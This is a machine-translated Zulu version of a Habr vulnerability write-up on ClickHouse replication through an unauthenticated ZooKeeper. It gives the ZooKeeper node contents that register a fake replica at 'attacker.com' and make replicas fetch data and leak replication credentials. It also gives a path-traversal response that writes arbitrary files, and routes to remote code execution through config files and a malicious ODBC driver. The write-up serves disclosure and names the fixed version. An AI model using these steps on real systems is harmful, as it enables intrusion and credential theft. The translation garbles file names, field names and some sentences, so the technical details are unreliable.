Lesi sihloko sizoxoxa indaba yokuba sengozini okucacile kuphrothokholi yokuphindaphinda ye-ClickHouse, futhi sizobonisa ukuthi indawo yokuhlasela inganwetshwa kanjani.
I-ClickHouse iyisizindalwazi sokugcina idatha enkulu, evamise ukusebenzisa ikhophi engaphezu kweyodwa. Ukuhlanganisa nokuphindaphinda ku-ClickHouse kwakhiwe phezulu
Ukufakwa okuzenzakalelayo kwe-ZK akudingi ukuqinisekiswa, ngakho izinkulungwane zamaseva e-ZK asetshenziselwa ukulungisa i-Kafka, i-Hadoop, i-ClickHouse zitholakala esidlangalaleni.
Ukuze unciphise indawo yakho yokuhlasela, kufanele uhlale ulungisa ukuqinisekiswa nokugunyazwa lapho ufaka i-ZooKeeper
Yebo kukhona ukuchithwa kwe-Java okusekelwe ku-0day, kodwa cabanga ukuthi umhlaseli angafunda futhi abhalele i-ZooKeeper, esetshenziselwa ukuphindaphinda kwe-ClickHouse.
Uma ilungiselelwe kumodi yeqoqo, i-ClickHouse isekela imibuzo esabalalisiwe /clickhouse/task_queue/ddl
.
Isibonelo, udala i-node /clickhouse/task_queue/ddl/query-0001
ngokuqukethwe:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']
futhi ngemva kwalokho, ithebula lokuhlola lizosuswa kumaseva eqoqo elithi host1 kanye ne-host2. I-DDL futhi isekela ukusebenzisa imibuzo ethi CREATE/ALTER/DROP.
Umsindo uyethusa? Kodwa umhlaseli angawatholaphi amakheli eseva?
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;
amanodi azokwakhiwa amakholomu ΠΈ Imethadatha.
Okuqukethwe /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
Ingabe kungenzeka ukuhlanganisa idatha esuka kuleli qoqo? Yebo, uma imbobo yokuphindaphinda (TCP/9009
) kuseva chXX-address
i-firewall ngeke ivalwe futhi ukuqinisekiswa kokuphindaphinda ngeke kulungiselelwe. Ungabudlula kanjani ubuqiniso?
Umhlaseli angakha ikhophi entsha ku-ZK ngokumane akopishe okuqukethwe kuyo /clickhouse/tables/01-01/foobar/replicas/chXX
nokuguqula incazelo host
.
Okuqukethwe /clickhouse/tables/01β01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
Khona-ke udinga ukutshela ezinye izifaniso ukuthi kukhona ibhulokhi entsha yedatha kuseva yomhlaseli okudingeka bayithathe - i-node yenziwa ku-ZK. /clickhouse/tables/01-01/foobar/log/log-00000000XX
(Ikhawunta ye-XX ekhula kancane, okufanele ibe nkulu kuneyokugcina kulogi yomcimbi):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2
kuphi umthombo_isithombe - igama lesifaniso somhlaseli esidalwe esinyathelweni sangaphambilini, block_id - isihlonzi se-data block, uthole - "thola i-block" umyalo (futhi
Okulandelayo, ikhophi ngayinye ifunda umcimbi omusha kulogi bese iya kuseva elawulwa umhlaseli ukuze ithole ibhulokhi yedatha (iphrothokholi yokuphindaphinda ingamambambili, isebenza phezu kwe-HTTP). Iseva attacker.com
uzothola izicelo:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX
lapho i-XXX iyidatha yokuqinisekisa yokuphindaphinda. Kwezinye izimo, lokhu kungase kube i-akhawunti enokufinyelela kusizindalwazi ngephrothokholi eyinhloko ye-ClickHouse kanye nephrothokholi ye-HTTP. Njengoba ubonile, indawo yokuhlasela iba nkulu kakhulu ngoba i-ZooKeeper, esetshenziselwa ukuphindaphinda, ishiywe ngaphandle kokuqinisekisa okulungiselelwe.
Ake sibheke umsebenzi wokuthola ibhulokhi yedatha ku-replica, kubhalwe ngokuqiniseka okugcwele ukuthi zonke izifaniso zingaphansi kokulawulwa okufanele futhi kukhona ukwethembana phakathi kwazo.
ikhodi yokucubungula ukuphindaphinda
Umsebenzi ufunda uhlu lwamafayela, amagama awo, osayizi, okuqukethwe, bese uwabhala ohlelweni lwamafayela. Kuyafaneleka ukuchaza ngokwehlukana ukuthi idatha igcinwa kanjani ohlelweni lwefayela.
Kunemibhalo engaphansi eminingana ku /var/lib/clickhouse
(uhlu oluzenzakalelayo lokugcina olusuka kufayela lokumisa):
amafulegi - umkhombandlela wokuqopha
tmp - umkhombandlela wokugcina amafayela esikhashana;
umsebenzisi_amafayela - ukusebenza okunamafayela ezicelweni kukhawulelwe kulolu hlu lwemibhalo (INTO OUTFILE nabanye);
Imethadatha - amafayela we-sql anezincazelo zetafula;
okucutshungulwe ngaphambili_okulungiselelwe - Amafayela okucushwa acutshunguliwe asuka ku- /etc/clickhouse-server
;
idatha - uhla lwemibhalo lwangempela olunedatha ngokwayo, kulokhu kusizindalwazi ngasinye uhla lwemibhalo olungaphansi oluhlukile luyakhiwa lapha (isibonelo /var/lib/clickhouse/data/default
).
Kuthebula ngalinye, uhla lwemibhalo olungaphansi luyakhiwa ohlwini lwemibhalo. Ikholomu ngayinye iyifayela elihlukile kuye ngokuthi
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2
I-replica ilindele ukwamukela amafayela anamagama afanayo lapho icubungula ibhulokhi yedatha futhi ayiwaqinisekisi nganoma iyiphi indlela.
Umfundi oqaphile cishe usezwile kakade mayelana nokuhlanganisa okungaphephile kwegama_legama emsebenzini WriteBufferFromFile
. Yebo, lokhu kuvumela umhlaseli ukuthi abhale okuqukethwe ngokunganaki kunoma yiliphi ifayela ku-FS elinamalungelo omsebenzisi clickhouse
. Ukwenza lokhu, umfanekiso olawulwa umhlaseli kufanele ubuyisele impendulo elandelayo esicelweni (izinqamuli zomugqa zengeziwe ukuze kube lula ukuqonda):
x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeper
futhi ngemva kokuhlangana ../../../../../../../../../tmp/pwned
ifayela lizobhalwa /tmp/pwned ngokuqukethwe hellofromzookeeper.
Kunezinketho ezimbalwa zokuguqula amandla okubhala ifayela abe yi-remote code execution (RCE).
Izichazamazwi zangaphandle nge-RCE
Ezinguqulweni ezindala, inkomba enezilungiselelo ze-ClickHouse yayigcinwe ngamalungelo omsebenzisi clickhouse okuzenzakalelayo. Amafayela ezilungiselelo angamafayela e-XML afundwa isevisi ekuqaleni bese egcina inqolobane /var/lib/clickhouse/preprocessed_configs
. Uma izinguquko zenzeka, ziphinda zifundwe. Uma ukwazi ukufinyelela /etc/clickhouse-server
umhlaseli angadala owakhe root
.
ODBC kuya ku-RCE
Lapho ufaka iphakheji, umsebenzisi uyadalwa clickhouse
, kodwa uhla lwayo lwasekhaya alwakhiwe /nonexistent
. Nokho, lapho usebenzisa izichazamazwi zangaphandle, noma ngezinye izizathu, abalawuli bakha inkomba /nonexistent
futhi unikeze umsebenzisi clickhouse
ukufinyelela kokuyibhalela (SSZB! cishe. umhumushi).
I-ClickHouse isekela odbc-bridge
, ngakho-ke akusakwazeki ukucacisa indlela yomshayeli esicelweni. Kodwa ingabe umhlaseli angabhalela uhla lwemibhalo lwasekhaya esebenzisa ukuba sengozini okuchazwe ngenhla?
Masidale ifayela ~/.odbc.ini
ngokuqukethwe okufana nalokhu:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.so
bese kuthi ekuqaleni SELECT * FROM odbc('DSN=lalala', 'test', 'test');
umtapo wolwazi uzolayishwa test.so
futhi yathola i-RCE (ngiyabonga
Lokhu kanye nobunye ubungozi bulungisiwe enguqulweni ye-ClickHouse engu-19.14.3. Nakekela i-ClickHouse yakho kanye ne-ZooKeepers!
Source: www.habr.com